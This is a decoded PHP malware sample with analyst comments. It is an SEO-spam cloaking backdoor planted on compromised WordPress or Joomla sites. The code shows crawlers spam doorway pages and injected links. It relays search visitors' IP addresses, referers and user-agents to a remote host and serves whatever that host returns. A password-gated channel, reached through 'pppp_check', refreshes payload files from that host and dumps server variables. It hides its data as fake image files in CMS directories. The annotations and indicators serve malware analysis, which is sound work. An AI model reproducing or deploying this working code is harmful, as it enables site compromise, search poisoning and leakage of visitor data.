/* Decoded by unphp.net */
/*
 * Analyst annotations (code below is unchanged apart from line breaks and comments).
 *
 * What the sample does, as far as the visible code shows:
 *   - Serves different content depending on the visitor: requests whose User-Agent
 *     matches a crawler pattern, or whose Referer matches a search-engine pattern,
 *     receive injected or remotely supplied content ("cloaking").
 *   - Exposes a password-gated control channel (parameters "pppp_check" and "p")
 *     that can refresh its data files from a remote host, answer a liveness probe,
 *     or dump its configuration together with the full $_SERVER array.
 *
 * Indicators visible in this listing:
 *   - Request parameter / cookie / header names: pppp_check, p
 *   - Response markers: ###UPDATING_FILES###, ###UPDATED###, ###WORKED###
 *   - Response header: X-CF-RAYX
 *   - Hidden directory named "." + md5(host without "www."), holding
 *     emoji1.png, metaicons.jpg and wp-themesall.gif; these are read as
 *     base64 text, not as images
 *   - Remote host (base64 in the source, defanged here): mag1cw0rld[.]com,
 *     paths /images/<md5 of host>/ and /ff.php
 */

// Removes the execution time limit for this request.
set_time_limit(0);

/**
 * Looks up a named input value across request data, cookies and server variables.
 *
 * The three superglobals are merged, so the value can arrive as a GET/POST field,
 * a cookie, or (through the "HTTP_" + upper-cased name fallback) a request header.
 * With array_merge, later arrays win on duplicate string keys, so $_SERVER
 * overrides $_COOKIE, which overrides $_REQUEST.
 *
 * @param string $a0 Name to look up.
 * @return mixed The value found, or "" when neither key exists.
 */
function get_val($a0){
    // "@" suppresses any warning from the merge.
    $i=@array_merge($_REQUEST,$_COOKIE,$_SERVER);
    $a=isset($i["$a0"])?$i["$a0"]:(isset($i["HTTP_".strtoupper($a0)])?$i["HTTP_".strtoupper($a0)]:"");
    return $a;
}

/**
 * Inserts link strings into a page next to elements matched by a regex.
 *
 * Each unique match (taken from capture group $res) gets one link appended
 * directly after its first occurrence. Links left over once the matches are
 * used up are joined with newlines and placed before the first closing body tag.
 *
 * @param string $page  Page markup to modify.
 * @param array  $links Strings to insert.
 * @param string $reg   PCRE pattern selecting the anchor elements.
 * @param int    $res   Index of the capture group to use from the matches.
 * @return string The modified page.
 */
function change_page_regex($page, $links,$reg,$res){
    $elements = array();
    if (preg_match_all($reg, $page, $result)) {
        $elements = $result[$res];
        $elements = array_unique($elements);
    }
    // Only as many insertions as there are both links and matched elements.
    $m=min(count($links),count($elements));
    for ($i = 0; $i < $m; $i++) {
        $link = array_shift($links);
        $element = array_shift($elements);
        // The matched text is quoted and used as a literal pattern; limit 1
        // restricts the change to the first occurrence.
        $page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1);
    }
    if (count($links)>0){
        // NOTE(review): these literals contain only newlines as shown; any
        // wrapping markup may have been lost when the page was extracted.
        $element = "

";
        $element .= implode("
", $links);
        $element .= "

";
        $page = preg_replace('/\<\/body\>/i', " " . $element . " $0", $page, 1);
    }
    return $page;
}

/**
 * Fetches a URL with cURL and returns the body plus the transfer info.
 *
 * TLS certificate and host-name verification are both switched off, so the
 * response is accepted from any endpoint that answers. The default User-Agent
 * is a desktop Chrome string; the timeout is 3000 seconds.
 *
 * @param string $url       URL to fetch.
 * @param string $useragent User-Agent header to send.
 * @return array [body or false, curl_getinfo() array].
 */
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36"){
    $ch = curl_init ();
    curl_setopt ($ch, CURLOPT_URL,$url);
    curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt ($ch, CURLOPT_TIMEOUT, 3000);
    // Certificate and host-name checks disabled.
    curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt ($ch, CURLOPT_USERAGENT, $useragent);
    $result = curl_exec ($ch);
    $curly_page_get_info=curl_getinfo($ch);
    curl_close($ch);
    return array($result,$curly_page_get_info);
}

/**
 * Requests the currently requested URL from the same host and relays it.
 *
 * The URL is rebuilt from HTTPS, HTTP_HOST and REQUEST_URI and fetched with
 * curly_page_get() using its default User-Agent. Status, content type and any
 * redirect target reported by cURL are copied into response headers.
 *
 * NOTE(review): the self-request re-enters whatever serves this URL; how
 * repeated re-entry is avoided is not visible in this listing.
 *
 * @param int $phead When truthy, an "X-CF-RAYX" response header is added.
 * @return array [body, content type].
 */
function get_proxy_page($phead=1){
    $proto="http://";
    if (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') {
        $proto="https://";
    }
    // Host and URI come straight from the client request.
    $crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI'];
    list($buf,$curly_page_get_info)=curly_page_get($crurl);
    $ct=@$curly_page_get_info['content_type'];
    $nexturl=@$curly_page_get_info['redirect_url'];
    $status=@$curly_page_get_info['http_code'];
    // "status" is written without "$": it is a bare constant, not the variable.
    // On PHP 8 an undefined constant raises an Error, so this line may leave
    // entries in the error log - TODO confirm against the host's PHP version.
    if (status!="")header("Status: $status");
    // Header value is the first 10 hex characters of md5(current time); the
    // header name itself is a fixed string usable as a response indicator.
    if ($phead)header("X-CF-RAYX: ".substr(md5(time()),0,10));
    if ($ct!=""){
        header("Content-type: $ct");
    }
    if ($nexturl!=""){
        header("Location: $nexturl");
    }
    return array($buf,$ct);
}

/**
 * Chooses a directory in which the data files will be kept.
 *
 * Order of preference: the system temp dir when PHP_OS contains "win"
 * (case-insensitive substring test); the first existing, writable entry of a
 * fixed list of WordPress/Joomla-style paths relative to the working
 * directory; the first writable sub-directory of the working directory; the
 * working directory itself; the system temp dir; finally ".".
 *
 * @return string Directory path.
 */
function get_db_path(){
    if (stristr(PHP_OS,"win")){
        return sys_get_temp_dir();
    }
    // Paths where extra files are less likely to stand out among CMS assets.
    $default_dirs = array(
        'wp-includes/SimplePie/Content',
        'wp-includes/js/tinymce/plugins',
        'wp-content/plugins/akismet/_inc/img',
        'administrator/components/com_media/views/images',
        'libraries/cms/html/language',
        'media/editors/tinymce/js/plugins',
        'tmp',
        'wp-content/uploads'
    );
    foreach ($default_dirs as $d)
        if (is_dir($d) && is_writable($d)) return ($d);
    $current_dir = opendir('.');
    // Skips entries consisting only of dots ("." and "..").
    while ($dir = readdir($current_dir))
        if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir);
    // Reached only when the loop found no writable sub-directory.
    closedir($current_dir);
    if (is_writable('.')) return ('.');
    $tmp_dir = sys_get_temp_dir();
    if (is_dir($tmp_dir) && 
is_writable($tmp_dir)) return $tmp_dir;
    return ".";
}

// ---- Top-level script: runs on every request that reaches this file ----

$content="";
// Control-channel command selector (see get_val for where it may come from).
$x=get_val("pppp_check");
// MD5 digest that the supplied password must hash to.
$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=strtolower(@$_SERVER["HTTP_HOST"]);
$uri=@$_SERVER["REQUEST_URI"];
$host=str_replace("www.","",$host);
// md5(host) names the hidden directory; md5(host + URI) keys the per-URL config.
$md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx);
$xmd5="/.".$md5host."/";
$cfile="emoji1.png";
// Reuse "./.<md5host>/" when the config file is already there; otherwise pick
// a writable location.
if (!@file_exists(".".$xmd5.$cfile)){
    $tmppath=get_db_path();
}else{
    $tmppath=".";
}
// Creates the dot-prefixed directory; errors are suppressed.
$tmppath=$tmppath.$xmd5;@mkdir($tmppath);
// Three data files with image extensions; all are read below as base64 text.
$configs=$tmppath.$cfile;
$bd=$tmppath."metaicons.jpg";
$templ=$tmppath."wp-themesall.gif";
@ini_set('memory_limit','1600M');
// Remote host name, stored base64-encoded in the source.
$domain=base64_decode("bWFnMWN3MHJsZC5jb20=");
$p="";
// The "p" value is base64-decoded, then MD5-hashed for the comparison below.
if ($x!="")$p=md5(base64_decode(get_val("p")));
if (($x!="")&&($p==$md5pass)){
    // ---- Password-gated control channel ----
    if ($x=="2"){
        // Command 2: overwrite the three data files with copies fetched over
        // plain HTTP from the remote host. Nothing checks the integrity of
        // what is downloaded.
        echo "###UPDATING_FILES### ";
        $ur="http://".$domain."/images/".$md5host."/";
        list($buf1,$t)=@curly_page_get($ur."emoji1.png");@file_put_contents($configs,$buf1);
        list($buf1,$t)=@curly_page_get($ur."metaicons.jpg");@file_put_contents($bd,$buf1);
        list($buf1,$t)=@curly_page_get($ur."wp-themesall.gif");@file_put_contents($templ,$buf1);
        echo "###UPDATED### ";
        exit;
    }
    if ($x=="4"){
        // Command 4: liveness probe.
        echo "###WORKED### ";exit;
    }
    if ($x=="5"){
        // Command 5: return the stored config, the full $_SERVER array, this
        // file's path and the data-file sizes, serialized and base64-encoded.
        $cf=array();
        if (@file_exists($configs)){
            // unserialize() on file content that originated from a remote
            // download; the content is not validated first.
            $cf=@unserialize(base64_decode(@file_get_contents($configs)));
        }
        $out=array(
            'cf' => $cf,
            'server' => $_SERVER,
            'file' => __FILE__,
            'configfile' => $configs,
            'db_file_size' => is_file($bd) ? filesize($bd) : 0,
            'template_file_size' => is_file($templ) ? 
filesize($templ) : 0,
        );
        echo base64_encode(serialize($out));
        exit;
    }
    // Any other command value with a valid password falls through silently.
}else{
    // ---- Ordinary visitor path ----
    $cf=array();
    if (@file_exists($configs)){
        $cf=@unserialize(base64_decode(@file_get_contents($configs)));
    }
    if (@isset($cf[$md5urx])){
        // This host+URI has an entry: classify the visitor.
        $bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"];
        // $se: Referer looks like a search engine. $bot: User-Agent looks like a crawler.
        if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1;
        if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1;
        // The config value is a byte offset into the record file; one line is
        // read from that offset and decoded into the record for this URL.
        $off=$cf[$md5urx]+0;
        $template=base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f));@fclose($f);$info=unserialize(base64_decode($buf));
        $keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"];
        if ($bot) {
            // Crawler branch: every path below ends in exit.
            if (isset($info["contenttype"])){$contenttype=base64_decode($info["contenttype"]);$types=explode(" ",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
            if (isset($info["isdoor"])){
                if (isset($info["standalone"])){
                    // Stored content is emitted as the whole response.
                    $doorcontent=base64_decode($text);
                    echo $doorcontent;exit;
                }else{
                    // Stored template is filled in, either from a marker =>
                    // replacement map or from the fixed %...% placeholders.
                    if ((isset($info["nr"]))&&(is_array($info["nr"]))){
                        foreach($info["nr"] as $mark => $repl){
                            $template=str_replace($mark,$repl,$template);
                        }
                    }else{
                        $template=str_replace("%text%",$text,$template);
                        $template=str_replace("%title%",$title,$template);
                        $template=str_replace("%description%",$description,$template);
                        $template=str_replace("%uckeyword%",$uckeyword,$template);
                        $template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
                        foreach($inside_links as $i => $link){
                            $template=str_replace("%INSIDE_LINK_".$i."%",$link,$template);
                        }
                    }
                    echo $template;exit;
                }
            }else{
                // Not a standalone entry: fetch the real page and, when it is
                // HTML, add the record's links next to anchors and paragraph ends.
                list($buf,$ct)=get_proxy_page();
                if (stristr($ct,"text/html")){
                    // NOTE(review): this pattern looks truncated; part of it
                    // may have been lost when the page was extracted.
                    $rega='/\.*?\<\/a\>/i';$resa=0;
                    $links=$info["links_a"];
                    $buf=change_page_regex($buf,$links,$rega,$resa);
                    // Captures the 30 characters before each closing paragraph tag.
                    $regp='/(.{30}\<\/p\>)/is';$resp=1;
                    $links=$info["links_p"];
                    $buf=change_page_regex($buf,$links,$regp,$resp);
                }
                echo $buf;exit;
            }
        }
        if ($se) {
            // Search-referred visitor branch.
            if (isset($info["isdoor"])){
                // The response body comes from the remote host. The request
                // sends the visitor's IP, Referer and User-Agent along with the
                // keyword, host and URL.
                list($buf,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
            }else{
                list($buf,$ct)=get_proxy_page();
            }
            echo $buf;exit;
        }
        // Neither crawler nor search-referred: nothing is emitted here and
        // execution continues past the end of this listing.
    }else{ 
list($buf,$ct)=get_proxy_page();
        // No entry for this URL: relay the self-requested page and stop.
        echo $buf;exit;
    }
}